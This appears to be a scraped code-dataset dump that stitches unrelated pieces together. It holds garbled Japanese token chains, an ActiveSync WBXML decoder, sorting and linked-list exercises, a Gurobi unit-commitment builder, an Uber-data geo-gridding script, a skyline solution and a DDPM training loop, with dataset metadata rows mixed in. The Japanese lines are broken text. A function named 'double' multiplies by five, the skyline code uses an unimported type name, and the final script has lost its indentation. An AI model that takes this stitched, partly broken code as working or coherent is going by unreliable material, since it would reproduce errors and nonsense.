「『計算 -> ()』という -> 道具を -> 用いて -> 研究する -> 計算機科学 -> ()の -> 一分野」を -> 指す -> 語。 -> 研究分野 」とも -> される。
概念と -> 道具を -> 用いて -> 研究する -> 計算機科学 -> ()の -> 一分野」を -> 指す -> 語。 -> 研究分野」とも -> される。
『コンピュータ -> ()』という -> 道具を -> 用いて -> 研究する -> 計算機科学 -> ()の -> 一分野」を -> 指す -> 語。 -> 研 究分野」とも -> される。
道具を -> 用いて -> 研究する -> 計算機科学 -> ()の -> 一分野」を -> 指す -> 語。 -> 研究分野」とも -> される。
『知能』を -> 研究する -> 計算機科学 -> ()の -> 一分野」を -> 指す -> 語。 -> 研究分野」とも -> される。
"""
import logging
from .ASWBXML import ASWBXML
class ASCommandResponse:
    """Decodes a WBXML-encoded ActiveSync command response into an XML string."""

    def __init__(self, response):
        # Keep the raw WBXML payload as received.
        self.wbxmlBody = response
        try:
            if ( len(response) > 0):
                self.xmlString = self.decodeWBXML(self.wbxmlBody)
            else:
                raise ValueError("Empty WBXML body passed")
        except Exception as e:
            self.xmlString = None
            raise ValueError("Error: {0}".format(e))

    def getWBXMLBytes(self):
        """Return the raw WBXML payload.

        BUGFIX: previously returned self.wbxmlBytes, an attribute that is
        never assigned anywhere, so every call raised AttributeError.
        """
        return self.wbxmlBody

    def getXMLString(self):
        """Return the decoded XML string."""
        return self.xmlString

    def decodeWBXML(self, body):
        """Parse *body* with ASWBXML and return its XML representation."""
        self.instance = ASWBXML()
        self.instance.loadBytes(body)
        return self.instance.getXml()
if __name__ == "__main__":
    import os

    # Decode every sample WBXML file under Samples/ and log the XML.
    logging.basicConfig(level=logging.INFO)
    project_dir = os.path.dirname(os.path.realpath("."))
    samples_dir = os.path.join(project_dir, "Samples/")
    for sample_name in os.listdir(samples_dir):
        with open(samples_dir + os.sep + sample_name, "rb") as sample_file:
            wbxml_bytes = sample_file.read()
            logging.info("-" * 100)
            logging.info(sample_name)
            logging.info("-" * 100)
            response = ASCommandResponse(wbxml_bytes)
            logging.info(response.xmlString)
def insertionSort(list):
    """Sort *list* in place, ascending, using insertion sort (stable, O(n^2)).

    NOTE(review): the parameter shadows the builtin `list`; the name is kept
    to preserve the public signature for keyword callers.
    """
    for i in range(1, len(list)):
        key = list[i]
        slot = i
        # Shift every larger element one position right, then drop key in.
        while slot > 0 and list[slot - 1] > key:
            list[slot] = list[slot - 1]
            slot -= 1
        list[slot] = key
if __name__ == "__main__":
    # Demo run: sort a sample list and show the result.
    sample = [54, 26, 93, 17, 77, 31, 44, 55, 20]
    insertionSort(sample)
    print(sample)
# Medium
# You're given two linked lists of potentially unequal length. Each Linked List represents a non-negative
# integer, where each node in the Linked List is a digit of that integer, and the first node in each Linked
# List always represents the least significant digit of the integer. Write a function that returns the head
# of a new Linked List that represents the sum of the integers represented by the two input Linked Lists.
# Note that your function must create and return a new Linked List, and you're not allowed to modify either
# of the input Linked Lists.
# Sample Input
# linkedListOne = 2 -> 4 -> 7 -> 1
# linkedListTwo = 9 -> 4 -> 5
# This is an input class. Do not edit.
class LinkedList:
    """Singly linked list node: one base-10 digit in `value`, successor in `next`."""
    def __init__(self, value):
        self.value = value
        self.next = None
def sumOfLinkedLists(linkedListOne, linkedListTwo):
    # NOTE(review): dead code -- this definition is immediately shadowed by
    # the second `sumOfLinkedLists` defined later in this file; only that
    # one is ever callable. Kept verbatim for reference.
    # Write your code here.
    carryOut = 0
    # `result` walks the output list; `head` keeps hold of its first node.
    result = LinkedList(0)
    head = result
    # Phase 1: both lists still have digits.
    while linkedListOne and linkedListTwo:
        cur_sum = linkedListOne.value + linkedListTwo.value + carryOut
        cur_value = cur_sum % 10
        carryOut = cur_sum // 10
        result.value = cur_value
        if linkedListOne.next or linkedListTwo.next:
            result.next = LinkedList(0)
            result = result.next
        linkedListOne = linkedListOne.next
        linkedListTwo = linkedListTwo.next
    # Phase 2: drain whichever list is longer, still propagating the carry.
    if linkedListOne:
        while linkedListOne:
            cur_sum = linkedListOne.value + carryOut
            cur_value = cur_sum % 10
            carryOut = cur_sum // 10
            result.value = cur_value
            if linkedListOne.next:
                result.next = LinkedList(0)
                result = result.next
            linkedListOne = linkedListOne.next
    if linkedListTwo:
        while linkedListTwo:
            cur_sum = linkedListTwo.value + carryOut
            cur_value = cur_sum % 10
            carryOut = cur_sum // 10
            result.value = cur_value
            if linkedListTwo.next:
                result.next = LinkedList(0)
                result = result.next
            linkedListTwo = linkedListTwo.next
    # A final carry becomes one extra most-significant digit.
    if carryOut:
        result.next = LinkedList(carryOut)
    return head
def sumOfLinkedLists(linkedListOne, linkedListTwo):
    """Digit-wise addition of two little-endian linked-list numbers.

    Builds and returns a brand-new list; neither input list is modified.
    Runs in O(max(n, m)) time and space.
    """
    head = None
    tail = None
    carry = 0
    nodeOne, nodeTwo = linkedListOne, linkedListTwo
    # Keep going while either list has digits left or a carry is pending.
    while nodeOne is not None or nodeTwo is not None or carry:
        digit_sum = carry
        if nodeOne is not None:
            digit_sum += nodeOne.value
            nodeOne = nodeOne.next
        if nodeTwo is not None:
            digit_sum += nodeTwo.value
            nodeTwo = nodeTwo.next
        carry, digit = divmod(digit_sum, 10)
        fresh = LinkedList(digit)
        if head is None:
            head = tail = fresh
        else:
            tail.next = fresh
            tail = fresh
    return head
## T = O(max(n, m)); S = O(max(n, m))
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Gurobiモデルを作成するためのモジュール.
Created on Sat Aug 14 23:35:25 2021
@author: y_hcr_manabe
"""
import os
import zipfile
import gurobipy as gp
from .._make_dir import _make_dir
from ._set_constraints import _set_constraints
from ._set_object_function import _set_object_function
from ._set_variables import _set_variables
def make_grb_model(uc_data, uc_dicts, i):
    """
    Create and return the Gurobi unit-commitment model.

    Parameters
    ----------
    uc_data : CLASS
        Instance of class "UCData"
    uc_dicts : CLASS
        Instance of class "UCDicts"
    i : int
        Index of the current run within the rolling-optimization list

    Returns
    -------
    model : Model
        Gurobi model
    """
    # Create (and cache in the config) the export directory on first use.
    if "_export_dir" not in uc_data.config:
        uc_data.config["_export_dir"] = _make_dir(
            uc_data.config["result_dir"], uc_data.config["_identify_str"]
        )
    _dir = _make_dir(str(uc_data.config["_export_dir"]), "log")
    _opt = uc_data.config["rolling_opt_list"][i]
    filename = _opt["name"] + ".log"
    env = gp.Env(str(_dir / filename))
    model = gp.Model("UC", env)
    # Populate variables, objective, constraints and solver options.
    _set_variables(model, uc_data, uc_dicts)
    _set_object_function(model, uc_data, uc_dicts)
    _set_constraints(model, uc_data, uc_dicts)
    _set_options(model, uc_data, uc_dicts)
    model.update()
    if uc_data.config["export_mps_file"]:
        _dir = _make_dir(str(uc_data.config["_export_dir"]), "mps")
        _opt = uc_data.config["rolling_opt_list"][i]
        filename = _opt["name"] + ".mps"
        filepath = str(_dir / filename)
        model.write(filepath)
        # BUGFIX: the ZipFile was never closed, so the zip's central
        # directory was only written whenever the GC happened to finalize
        # the object, leaving a corrupt archive in the meantime. The context
        # manager closes it before the source .mps file is deleted.
        with zipfile.ZipFile(
            filepath + ".zip", mode="w", compression=zipfile.ZIP_DEFLATED
        ) as zip_file:
            zip_file.write(filepath, arcname=filename)
        os.remove(filepath)
    return model
def _set_options(m, uc_data, uc_dicts):
    """
    Apply optional Gurobi solver parameters from the configuration.

    Each parameter is set only when the corresponding "grb_*" key exists.

    Parameters
    ----------
    m : CLASS
        Gurobi model
    uc_data : CLASS
        Instance of class "UCData"
    uc_dicts : CLASS
        Instance of class "UCDicts" (unused here; kept for a signature
        uniform with the other _set_* helpers)
    """
    if "grb_MIPGap" in uc_data.config:
        m.Params.MIPGap = uc_data.config["grb_MIPGap"]
    if "grb_MIPGapAbs" in uc_data.config:
        m.Params.MIPGapAbs = uc_data.config["grb_MIPGapAbs"]
    if "grb_IntegralityFocus" in uc_data.config:
        m.Params.IntegralityFocus = uc_data.config["grb_IntegralityFocus"]
    if "grb_FeasibilityTol" in uc_data.config:
        m.Params.FeasibilityTol = uc_data.config["grb_FeasibilityTol"]
# defined function
# tested validity of the function
# called it three times
def double(sequence):
    """Return a new list with every element of *sequence* multiplied by 5.

    NOTE: despite the name, the factor is 5 -- this matches the recorded
    sample outputs that accompany the function.
    """
    return [item * 5 for item in sequence]
# Pasted interactive-session transcript: each call is followed by the value
# the interpreter echoed.  When this file is run as a script, these bare
# expressions are evaluated and their results silently discarded.
double([7, 8, 9])
[35, 40, 45]
double([5, 10, 15])
[25, 50, 75]
double([3, 6, 9])
[15, 30, 45]
| CompThinking19/exploratory-programming-1-tdg52 | Exploratory1.py | Exploratory1.py | py | 297 | python | en | code | 0 | github-code | 90 |
import pickle
from collections import Counter

import numpy as np
import pandas as pd
from matplotlib import colors
from matplotlib import pyplot as plt
from pyproj import Proj, Transformer, transform
def longLatToXY(long, lat):
    """
    Convert epsg:4326 lon/lat coordinates (degrees) to epsg:3857 x/y (metres).

    :param long: longitude in degrees
    :param lat: latitude in degrees
    :return: (x, y) tuple
    """
    # Transformer.from_crs replaces the Proj(init=...) / pyproj.transform
    # pair, which is deprecated since pyproj 2 and removed in pyproj 3.
    # always_xy=True preserves the (lon, lat) -> (x, y) axis order that the
    # old init=-based API used.
    # NOTE(review): recent pyproj versions cache from_crs internally; hoist
    # the transformer to module level if profiling shows it matters.
    transformer = Transformer.from_crs("epsg:4326", "epsg:3857", always_xy=True)
    return transformer.transform(long, lat)
def XyToLongLat(x, y):
    """
    Convert epsg:3857 x/y coordinates (metres) to epsg:4326 lon/lat (degrees).

    :param x: x coordinate
    :param y: y coordinate
    :return: (long, lat) tuple
    """
    # Transformer.from_crs replaces the Proj(init=...) / pyproj.transform
    # pair, which is deprecated since pyproj 2 and removed in pyproj 3.
    # always_xy=True keeps the (x, y) -> (lon, lat) axis order of the old API.
    # (Docstring typo "epsg:3856" in the original corrected to epsg:3857.)
    transformer = Transformer.from_crs("epsg:3857", "epsg:4326", always_xy=True)
    return transformer.transform(x, y)
def main():
    """Preprocess the raw Uber pickup CSV: derive calendar features, rotate
    and project the coordinates to epsg:3857, bin them on a 500 m grid, and
    persist the enriched frame as pickle and CSV next to the input file.

    Side effects: reads ``dataPath`` and writes three files alongside it.
    """
    # set path to dataset (csv) -- hardcoded to the author's machine
    dataPath = '/Users/chanaross/Documents/Thesis/UberData/allData.csv'
    xGridResolution = 500 # grid rectangle width (epsg:3857 units, ~metres)
    yGridResolution = 500 # grid rectangle height (epsg:3857 units, ~metres)
    # read data to dataframe
    df = pd.read_csv(dataPath)
    # date manipulation: expand the raw timestamp string into calendar features
    df['TimeStamp'] = pd.DatetimeIndex(df['Date/Time'])
    df['weekday'] = df['TimeStamp'].dt.weekday
    df['weeknum'] = df['TimeStamp'].dt.week
    df['month'] = df['TimeStamp'].dt.month
    df['hour'] = df['TimeStamp'].dt.hour
    df['minute'] = df['TimeStamp'].dt.minute
    # remove string datetime, keep stamp
    df = df.drop('Date/Time', axis=1)
    # add repetitive weekly time id: index of the 15-minute slot within a week
    # (weekday * 96 slots/day + hour * 4 + minute // 15)
    df['weekPeriod'] = df['weekday']*(24*4) + df['hour']*4 + np.floor_divide(df['minute'], 15).astype(np.int64)
    # 4-hour block of the day (0-5)
    df['dayQuad'] = np.floor_divide(df['hour'], 4).astype(np.int64)
    # coordinate transformation and grid creation
    # transform picture to be straight with lat , lon (transformation angle is 36.1)
    # NOTE(review): 36.1 deg presumably aligns the street grid with the axes
    # before binning -- confirm against the data source.
    df['Fixed_Lon'] = df['Lon'] * np.cos(36.1 * np.pi / 180) - df['Lat'] * np.sin(36.1 * np.pi / 180)
    df['Fixed_Lat'] = df['Lat'] * np.cos(36.1 * np.pi / 180) + df['Lon'] * np.sin(36.1 * np.pi / 180)
    df['original_Lon'] = df['Lon']
    df['original_Lat'] = df['Lat']
    df['Lon'] = df['Fixed_Lon']
    df['Lat'] = df['Fixed_Lat']
    # create list of tuples of long lat coordiantes (zip object, consumed once below)
    longLatTupleList = zip(df['Lon'].tolist(), df['Lat'].tolist())
    # create list of tuples of x,y coordiantes
    xyTupleList = [longLatToXY(*t) for t in longLatTupleList]
    # add to df
    xCoordinates = [c[0] for c in xyTupleList]
    yCoordinates = [c[1] for c in xyTupleList]
    df['x'] = xCoordinates
    df['y'] = yCoordinates
    # create grid anchored at the minimum observed coordinates
    xMinCoord = np.min(df['x'])
    yMinCoord = np.min(df['y'])
    # calculate distance from grid edges
    df['x_grid_dist'] = df['x']-xMinCoord
    df['y_grid_dist'] = df['y']-yMinCoord
    # add grid indices to dataframe
    df['grid_x'] = np.floor_divide(df['x_grid_dist'], xGridResolution).astype(np.int64)
    df['grid_y'] = np.floor_divide(df['y_grid_dist'], yGridResolution).astype(np.int64)
    # add single index grid id
    maxXgrid = np.max(df['grid_x'])
    # NOTE(review): grid_x ranges 0..maxXgrid inclusive, so multiplying grid_y
    # by maxXgrid (rather than maxXgrid + 1) lets distinct cells collide, e.g.
    # (grid_x=maxXgrid, grid_y=0) and (grid_x=0, grid_y=1) share an id --
    # confirm whether downstream consumers rely on id uniqueness.
    df['grid_id'] = df['grid_x'] + df['grid_y']*maxXgrid
    # pickle data
    # NOTE(review): the frame is saved twice under nearly identical names
    # (single vs. double underscore before "Gridpickle500") -- likely a typo;
    # verify which file downstream code actually reads.
    df.to_pickle(dataPath.replace('.csv', 'LatLonCorrected_Gridpickle500.p'))
    with open (dataPath.replace('.csv', 'LatLonCorrected__Gridpickle500.p'), 'wb') as op:
        pickle.dump(df,op)
    df.to_csv(dataPath.replace('.csv', 'LatLonCorrected_GridXY500.csv'))
    return
# Script entry point: run the preprocessing pipeline only when executed
# directly.  (Stray extraction residue after print('Done.') removed -- it
# made the line invalid Python.)
if __name__ == '__main__':
    main()
    print('Done.')
4958288371 | '''
218. The Skyline Problem
Hard
A city's skyline is the outer contour of the silhouette formed by all the buildings in that city when viewed from a distance. Now suppose you are given the locations and height of all the buildings as shown on a cityscape photo (Figure A), write a program to output the skyline formed by these buildings collectively (Figure B).
Buildings Skyline Contour
The geometric information of each building is represented by a triplet of integers [Li, Ri, Hi], where Li and Ri are the x coordinates of the left and right edge of the ith building, respectively, and Hi is its height. It is guaranteed that 0 ≤ Li, Ri ≤ INT_MAX, 0 < Hi ≤ INT_MAX, and Ri - Li > 0. You may assume all buildings are perfect rectangles grounded on an absolutely flat surface at height 0.
For instance, the dimensions of all buildings in Figure A are recorded as: [ [2 9 10], [3 7 15], [5 12 12], [15 20 10], [19 24 8] ] .
The output is a list of "key points" (red dots in Figure B) in the format of [ [x1,y1], [x2, y2], [x3, y3], ... ] that uniquely defines a skyline. A key point is the left endpoint of a horizontal line segment. Note that the last key point, where the rightmost building ends, is merely used to mark the termination of the skyline, and always has zero height. Also, the ground in between any two adjacent buildings should be considered part of the skyline contour.
For instance, the skyline in Figure B should be represented as:[ [2 10], [3 15], [7 12], [12 0], [15 10], [20 8], [24, 0] ].
Notes:
The number of buildings in any input list is guaranteed to be in the range [0, 10000].
The input list is already sorted in ascending order by the left x position Li.
The output list must be sorted by the x position.
There must be no consecutive horizontal lines of equal height in the output skyline. For instance, [...[2 3], [4 5], [7 5], [11 5], [12 7]...] is not acceptable; the three lines of height 5 should be merged into one in the final output as such: [...[2 3], [4 5], [12 7], ...]
'''
from __future__ import annotations
import heapq
class Solution:
    def getSkyline(self, buildings: List[List[int]]) -> List[List[int]]:
        """Return the skyline key points for *buildings* ([left, right, height]).

        Sweep-line over a sorted list of edge events with a max-heap (heights
        negated) of the buildings currently overhead.  Sorting the events
        provides the crucial tie-breaking for free: at equal x, left edges
        (negative second element) precede right edges, and among left edges
        the tallest is processed first, so a taller roof at the same x is
        never shadowed by a shorter one, and a left edge at the same x as a
        right edge is pushed before the right edge is resolved.
        """
        events = sorted(
            [[left, -height, right, True] for left, right, height in buildings]
            + [[right, height, right, False] for left, right, height in buildings]
        )
        # Heap entries are [negated height, right edge]; the sentinel keeps a
        # ground level of height 0 on the heap at all times (its end of -1
        # stops the cleanup loop below).
        active = [[0, -1]]
        skyline = [[-1, 0]]  # sentinel start point, stripped before returning
        for x, neg_h, right_edge, is_left in events:
            if is_left:
                # Entering a building: it may become the new tallest.
                heapq.heappush(active, [neg_h, right_edge])
            elif right_edge == active[0][1] and neg_h == -active[0][0]:
                # Leaving the building that currently defines the skyline:
                # discard it together with any stale entries whose buildings
                # already ended at or before this x (lazy deletion).
                while 0 <= active[0][1] <= right_edge:
                    heapq.heappop(active)
            # Emit a key point whenever the visible height changed.
            if skyline[-1][1] != -active[0][0]:
                skyline += [[x, -active[0][0]]]
        return skyline[1:]
# Smoke test: two abutting buildings of equal height should merge into a
# single skyline segment -> expected output [[0, 3], [5, 0]].
s=Solution()
r=s.getSkyline([[0,2,3],[2,5,3]])
print(r)
25926779350 | import tqdm
import copy
import torch
from utils.configs import config_parser
from utils.common import create_usage
from utils.ddpm import batch_diffusion, batch_inverse
from utils.wandb_helper import LOG
from utils.ema import EMA
from dataset.data import POKEMON_DATASET
if __name__ == "__main__":
# NOTE Step: Preparation
# * train configures
hparams = config_parser()
# * train dataset and dataloader
dataset = POKEMON_DATASET(hparams)
dataloader = dataset.set_loader(bs=hparams.batch_size, is_shuffle=True)
hparams.max_step = hparams.max_epoch * len(dataloader)
# * ddpm model, ddpm noise, optim, optim_sched, loss_func
ddpm_model, ddpm_noise_sched, ddpm_optim, ddpm_optim_sched, ddpm_loss_func = create_usage(hparams)
# * ema for better performance
ema = EMA(hparams.ema_beta)
ema_model = copy.deepcopy(ddpm_model).eval().requires_grad_(False)
logger = LOG()
logger.log_in(configs=hparams, name=hparams.exp_name, project="DDPM")
logger.log_metric_init()
# NOTE Step: Train
# * training loop
cur_iter = 0
pbar_epoch = tqdm.tqdm(range(hparams.max_epoch), desc="train ddpm", leave=True)
for cur_ep in pbar_epoch:
pbar_iter = tqdm.tqdm(dataloader, desc=f"train epoch {cur_ep}", leave=False)
loss_ep = 0
for batch_data in pbar_iter:
batch_data = batch_data.to(hparams.device)
batch_noise, batch_out_sample = batch_diffusion(hparams, batch_data, ddpm_noise_sched, ddpm_model)
loss = ddpm_loss_func(batch_noise, batch_out_sample)
loss.backward()
torch.nn.utils.clip_grad_norm_(ddpm_model.parameters(), 1.0)
ddpm_optim.step()
ddpm_optim_sched.step()
ddpm_optim.zero_grad()
ema.step_ema(ema_model, ddpm_model)
loss_iter = loss.item()
loss_ep += loss_iter
pbar_iter.set_postfix_str(f"[TRAIN] Iter: {cur_iter} Loss: {loss_iter:.3f}", refresh=True)
pbar_epoch.set_postfix_str(f"[TRAIN] EP: {cur_ep} Loss: {loss_ep:.3f}", refresh=True)
logger.log_value(tag="train", name="ep_loss", value=loss_ep, step=cur_ep)
# * test loop
if (cur_ep+1)%hparams.eval_epoch == 0:
images_pred = batch_inverse(hparams, ddpm_noise_sched, ddpm_model)
images_pred = images_pred.cpu().detach().clone().permute([0,2,3,1]).numpy()
logger.log_images(tag="test", name="ddpm_generation", values=images_pred, step=cur_ep, n_col=5)
logger.log_out() | jameskuma/Simple_Diffusion | run.py | run.py | py | 2,544 | python | en | code | 0 | github-code | 90 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.